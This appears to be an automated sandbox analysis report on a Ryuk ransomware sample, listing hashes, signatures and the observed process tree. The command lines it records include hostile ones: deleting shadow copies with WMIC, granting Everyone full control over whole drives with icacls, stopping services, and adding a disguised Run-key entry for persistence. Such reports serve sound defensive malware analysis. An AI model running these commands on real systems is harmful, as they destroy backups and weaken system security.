Analysis

Max time kernel: 175s
Max time network: 174s
Platform: windows10-2004_x64
Resource: win10v2004-en-20220112
Submitted: 20-02-2022 08:42

Static task: static1

Behavioral task: behavioral1
  Sample: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  Resource: win7-en-20211208

Behavioral task: behavioral2
  Sample: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  Resource: win10v2004-en-20220112
General

Target: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
Size: 190KB
MD5: ffef678beca8ee60200bc88809d89630
SHA1: b31070af1ac3e088dfc6f1599f8d12edb1b16783
SHA256: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689
SHA512: 54298098a866e24d99e3764154ae3ca4481e9163fd6e9e0d2c27d7978065a38da38accd58268c985b4ed0cfd4c11a27f4fa51e815c2d7a15e3ec18c453df89c3
Malware Config

Extracted
  Path: C:\Users\Admin\AppData\Local\Temp\RyukReadMe.html
  Family: ryuk

Extracted
  Path: C:\RyukReadMe.html
  Family: ryuk
Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.

Executes dropped EXE (1 IoC)
Processes: xCQauhX.exe
  PID 1580  xCQauhX.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe, xCQauhX.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation  xCQauhX.exe

Modifies file permissions (1 TTP, 4 IoCs)
Processes: icacls.exe, icacls.exe, icacls.exe, icacls.exe
  PID 1276  icacls.exe
  PID 2304  icacls.exe
  PID 3748  icacls.exe
  PID 1872  icacls.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe"  reg.exe

Drops file in Windows directory (1 IoC)
Processes: svchost.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat  svchost.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies data under HKEY_USERS (49 IoCs)
Processes: svchost.exe
Runs net.exe

Suspicious behavior: EnumeratesProcesses (10 IoCs)
Processes: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe, xCQauhX.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 1580  xCQauhX.exe
  PID 1580  xCQauhX.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
Suspicious use of AdjustPrivilegeToken (45 IoCs)
Processes: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe, xCQauhX.exe, WMIC.exe, WMIC.exe
  Token: SeDebugPrivilege   PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  Token: SeBackupPrivilege  PID 1580  xCQauhX.exe
  Token: SeBackupPrivilege  PID 3808  320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
  PID 1188  WMIC.exe  Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 4376  WMIC.exe  Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe, net.exe, net.exe, xCQauhX.exe, net.exe, net.exe, cmd.exe
  Source PID / process -> target PID / process (identical entries grouped with their count)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 1580 xCQauhX.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2228 sihost.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2244 svchost.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2296 taskhostw.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2528 svchost.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2744 DllHost.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2904 StartMenuExperienceHost.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2984 RuntimeBroker.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3064 SearchApp.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2628 RuntimeBroker.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 4068 net.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 1780 net.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3324 RuntimeBroker.exe
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2572 RuntimeBroker.exe
  4068 net.exe -> 1860 net1.exe (3 entries)
  1780 net.exe -> 1052 net1.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 408 backgroundTaskHost.exe
  1580 xCQauhX.exe -> 1872 icacls.exe (3 entries)
  1580 xCQauhX.exe -> 1276 icacls.exe (3 entries)
  1580 xCQauhX.exe -> 3904 cmd.exe (3 entries)
  1580 xCQauhX.exe -> 2268 net.exe (3 entries)
  2268 net.exe -> 3464 net1.exe (3 entries)
  1580 xCQauhX.exe -> 1404 net.exe (3 entries)
  1404 net.exe -> 3120 net1.exe (3 entries)
  3904 cmd.exe -> 1188 WMIC.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 2304 icacls.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3748 icacls.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3308 cmd.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3608 net.exe (3 entries)
  3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -> 3232 cmd.exe
Processes

C:\Windows\system32\sihost.exe (PID 2228)
  Command line: sihost.exe

C:\Windows\system32\taskhostw.exe (PID 2296)
  Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe (PID 2244)
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup

C:\Windows\system32\DllHost.exe (PID 2744)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe (PID 2904)
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\system32\svchost.exe (PID 2528)
  Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p

C:\Windows\System32\RuntimeBroker.exe (PID 2984)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe (PID 3064)
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe (PID 2628)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe (PID 2572)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe (PID 3324)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe (PID 3808)
  Command line: "C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe"
  Signatures: Checks computer location settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe (PID 1580)
      Command line: "C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe" 8 LAN
      Signatures: Executes dropped EXE; Checks computer location settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\icacls.exe (PID 1872)
          Command line: icacls "C:\*" /grant Everyone:F /T /C /Q
          Signatures: Modifies file permissions

        C:\Windows\SysWOW64\icacls.exe (PID 1276)
          Command line: icacls "D:\*" /grant Everyone:F /T /C /Q
          Signatures: Modifies file permissions

        C:\Windows\SysWOW64\cmd.exe (PID 3904)
          Command line: cmd /c "WMIC.exe shadowcopy delet"
          Signatures: Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1188)
              Command line: WMIC.exe shadowcopy delet
              Signatures: Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\net.exe (PID 2268)
          Command line: "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
          Signatures: Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\net1.exe (PID 3464)
              Command line: C:\Windows\system32\net1 stop "audioendpointbuilder" /y

        C:\Windows\SysWOW64\net.exe (PID 1404)
          Command line: "C:\Windows\System32\net.exe" stop "samss" /y
          Signatures: Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\net1.exe (PID 3120)
              Command line: C:\Windows\system32\net1 stop "samss" /y

        C:\Windows\SysWOW64\cmd.exe (PID 4440)
          Command line: "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe" /f /reg:64

    C:\Windows\SysWOW64\net.exe (PID 4068)
      Command line: "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
      Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net1.exe (PID 1860)
          Command line: C:\Windows\system32\net1 stop "audioendpointbuilder" /y

    C:\Windows\SysWOW64\net.exe (PID 1780)
      Command line: "C:\Windows\System32\net.exe" stop "samss" /y
      Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net1.exe (PID 1052)
          Command line: C:\Windows\system32\net1 stop "samss" /y

    C:\Windows\SysWOW64\icacls.exe (PID 2304)
      Command line: icacls "C:\*" /grant Everyone:F /T /C /Q
      Signatures: Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe (PID 3308)
      Command line: cmd /c "WMIC.exe shadowcopy delet"

        C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 4376)
          Command line: WMIC.exe shadowcopy delet
          Signatures: Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\icacls.exe (PID 3748)
      Command line: icacls "D:\*" /grant Everyone:F /T /C /Q
      Signatures: Modifies file permissions

    C:\Windows\SysWOW64\net.exe (PID 3608)
      Command line: "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y

        C:\Windows\SysWOW64\net1.exe (PID 4320)
          Command line: C:\Windows\system32\net1 stop "audioendpointbuilder" /y

    C:\Windows\SysWOW64\cmd.exe (PID 3232)
      Command line: "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe" /f /reg:64

        C:\Windows\SysWOW64\reg.exe (PID 4464)
          Command line: REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe" /f /reg:64
          Signatures: Adds Run key to start application

    C:\Windows\SysWOW64\net.exe (PID 4248)
      Command line: "C:\Windows\System32\net.exe" stop "samss" /y

        C:\Windows\SysWOW64\net1.exe (PID 4352)
          Command line: C:\Windows\system32\net1 stop "samss" /y

C:\Windows\system32\backgroundTaskHost.exe (PID 408)
  Command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\svchost.exe (PID 1904)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p
  Signatures: Drops file in Windows directory; Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v6
Downloads